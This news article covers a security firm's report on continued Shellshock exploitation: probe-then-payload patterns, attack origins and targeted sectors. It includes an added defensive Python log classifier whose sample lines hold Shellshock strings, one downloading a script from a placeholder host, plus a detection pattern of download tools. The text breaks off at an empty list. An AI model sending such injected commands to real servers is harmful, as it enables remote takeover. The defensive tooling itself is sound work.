Bash Bug Still Exploited, Report Finds 600,000 Shellshock Events in the Last 3 Months

Shellshock, the Bash bug heralded as the next Heartbleed, is still being successfully exploited by attackers 10 months after it was revealed to the world.

Discovered in late September 2014, the bug has gone through a series of patches, but as the Solutionary Security Engineering Research Team (SERT) points out in its 2015 Q2 report, Shellshock is alive and well and is still being used even now.

SERT identified over 600,000 Shellshock-related events in the last 3 months, spread across 25,000 unique IP addresses and originating from 2,027 various service providers, businesses, and industries.

Attackers checked for Shellshock vulnerability before executing the payload

Profiling the attacks, Solutionary’s SERT team observed that “nearly 60% of identified Shellshock traffic was designed to determine if the hosts were vulnerable.”

If the check came back positive, attackers would then download and execute bash shell scripts, putting the underlying servers at their disposal.

Besides shell scripts, SERT found that attack payloads were also delivered via .c.txt files, ELF binaries, and Perl and PHP scripts.
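A defender can make the same probe-versus-payload split over their own web server logs. The Python below is an added example, not code from the SERT report or this article; the sample log lines, the marker string, the download-tool list and the host example.invalid are constructed assumptions.

```python
import re
from collections import Counter

# Bash function-definition prefix that Shellshock requests carry in a header value.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
# Download tools (heuristic list, assumed for this example).
FETCH_RE = re.compile(r'\b(wget|curl|fetch|lwp-download|tftp)\b', re.I)
# File types the report names as payloads; ELF binaries carry no fixed extension.
PAYLOAD_EXT_RE = re.compile(r'\.(sh|c\.txt|pl|php)\b', re.I)
# Apache/nginx combined log format; quoted fields may contain escaped quotes.
Q = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] ' + Q + r' \d{3} \S+ ' + Q + ' ' + Q)

# Constructed sample lines (documentation IP ranges, placeholder host).
SAMPLE = [
    '192.0.2.10 - - [01/Jul/2015:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jul/2015:10:00:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :; }; echo; echo probe-marker"',
    '203.0.113.9 - - [01/Jul/2015:10:00:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :; }; wget http://example.invalid/a.sh"',
    '198.51.100.7 - - [01/Jul/2015:10:00:12 +0000] "GET /cgi-bin/test HTTP/1.0" 404 0 "() { :; }; echo probe-marker" "-"',
]

def classify(line):
    """Return None (benign or unparsed), 'probe' or 'payload' for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    _ip, request, referer, agent = m.groups()
    # Keep only the fields that carry the function-definition prefix.
    hits = " ".join(f for f in (request, referer, agent) if SHELLSHOCK_RE.search(f))
    if not hits:
        return None
    if FETCH_RE.search(hits) or PAYLOAD_EXT_RE.search(hits):
        return "payload"
    return "probe"

def summarize(lines):
    """Count probe and payload events and collect the source addresses."""
    counts, sources = Counter(), set()
    for line in lines:
        kind = classify(line)
        if kind:
            counts[kind] += 1
            sources.add(line.split(" ", 1)[0])
    return counts, sources

if __name__ == "__main__":
    counts, sources = summarize(SAMPLE)
    print(dict(counts), sorted(sources))
```

A source that appears first as a probe and later as a payload request against the same host is the sequence the report describes, and is worth prioritizing in triage.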

Nearly half of attacks originated from the US

The sources of the attacks are mainly located in the US, UK, China, South Korea, Germany, and Japan.

This shouldn’t surprise anyone, since these countries are also where classic and cloud-based hosting services are most often located.

Since hosting servers run on POSIX systems and are vulnerable, it was no surprise to the SERT team to discover that most attacks are carried out via ISPs, with GoDaddy and Korea Telecom being the two most abused.

As for the targets of the Shellshock attacks, the education sector had it the worst with 38% of all detected events, followed by technology (17%), healthcare (6%), finances (5%), and manufacturing (5%).

Besides one-off attacks, Solutionary also observed more organized operations: Shellshock campaigns carried out by well-organized groups that paid special attention to covering their tracks. The most important are listed below:


